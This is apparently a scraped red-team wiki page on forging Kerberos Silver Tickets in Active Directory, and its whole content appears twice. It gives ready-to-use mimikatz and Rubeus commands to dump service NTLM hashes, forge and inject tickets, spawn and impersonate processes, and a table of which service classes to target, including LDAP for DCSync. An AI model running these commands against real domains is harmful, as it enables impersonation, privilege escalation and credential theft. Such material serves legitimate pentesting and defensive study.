Silver Ticket

Last updated 8 months ago

Was this helpful?

Silver Ticket

We know that authorizations/permissions (group memberships) are provided by the KDC in the TGS and then checked by the SPN in question. This means that if we have the credentials/hash of the SPN (kerberoasting, NTLM account, etc.), we can create a Silver Ticket with any privilege.

There is an optional authentication, rarely implemented for service applications, called PAC () validation, which consists of a check that the service does with the domain controller of the permissions and authorizations.

Attack

If you have administrator privileges you can get the NTLM hashes of the services with sekurlsa::logonpasswords. Otherwise use other techniques.

Forge Silver Ticket

.\mimikatz.exe
kerberos::golden /sid:<SID_DOMAIN> /domain:<DOMAIN> /ptt /target:<TARGET> /service:<NAME_SPN> /rc4:<NTLM_SPN> /id:<FOR_RID> /user:<FOR_USER>

/ptt

Inject the forged ticket to memory to make it usable immediately

/sid

Domain SID (whoami /user without RID)

/domain

Domain in FQDN

/target

Machine that hosting the attacked service in FQDN

/service

/rc4

NTLM hash of the service for encryption. There is also /ntlm,/aes128 or /aes256

/id

For which RID to forge the ticket

/user

For which user to forge the ticket (can be fake)

ex.

kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin

Rubeus.exe silver /service:<NAME_SPN>/<TARGET> /rc4:<NTLM_SPN> /user:<FOR_USER> /domain:<DOMAIN> /sid:<SID_DOMAIN> /nowrap /ptt

Also possible to use: /aes128, /aes256, /des

For arguments see mimikatz above.

Create Ticket

Rubeus.exe silver /service:<NAME_SPN>/<TARGET> /rc4:<NTLM_SPN> /user:<FOR_USER> /domain:<DOMAIN> /sid:<SID_DOMAIN> /nowrap
# Take note ticket

Also possible to use: /aes128, /aes256, /des

Create Process

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:<PASS>
# Take note of the LUID and PID

Username and password can be anything

Inject Ticket

Rubeus.exe ptt /luid:<LUID> /ticket:<TICKET>

Impersonate Process

Invoke-SharpImpersonation -Command "pid:<PID>"

SPN service

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Depending on OS also:

WSMAN

RPCSS

WinRM

HOST

HTTP

In some occasions you can just ask for: WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Last updated 8 months ago

Was this helpful?

Attack

If you have administrator privileges you can get the NTLM hashes of the services with sekurlsa::logonpasswords. Otherwise use other techniques.

Forge Silver Ticket

.\mimikatz.exe
kerberos::golden /sid:<SID_DOMAIN> /domain:<DOMAIN> /ptt /target:<TARGET> /service:<NAME_SPN> /rc4:<NTLM_SPN> /id:<FOR_RID> /user:<FOR_USER>

/ptt

Inject the forged ticket to memory to make it usable immediately

/sid

Domain SID (whoami /user without RID)

/domain

Domain in FQDN

/target

Machine that hosting the attacked service in FQDN

/service

/rc4

NTLM hash of the service for encryption. There is also /ntlm,/aes128 or /aes256

/id

For which RID to forge the ticket

/user

For which user to forge the ticket (can be fake)

ex.

kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin

Rubeus.exe silver /service:<NAME_SPN>/<TARGET> /rc4:<NTLM_SPN> /user:<FOR_USER> /domain:<DOMAIN> /sid:<SID_DOMAIN> /nowrap /ptt

Also possible to use: /aes128, /aes256, /des

For arguments see mimikatz above.

Create Ticket

Rubeus.exe silver /service:<NAME_SPN>/<TARGET> /rc4:<NTLM_SPN> /user:<FOR_USER> /domain:<DOMAIN> /sid:<SID_DOMAIN> /nowrap
# Take note ticket

Also possible to use: /aes128, /aes256, /des

Create Process

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:<PASS>
# Take note of the LUID and PID

Username and password can be anything

Inject Ticket

Rubeus.exe ptt /luid:<LUID> /ticket:<TICKET>

Impersonate Process

With .

Invoke-SharpImpersonation -Command "pid:<PID>"

SPN service

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Depending on OS also:

WSMAN

RPCSS

WinRM

HOST

HTTP

In some occasions you can just ask for: WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt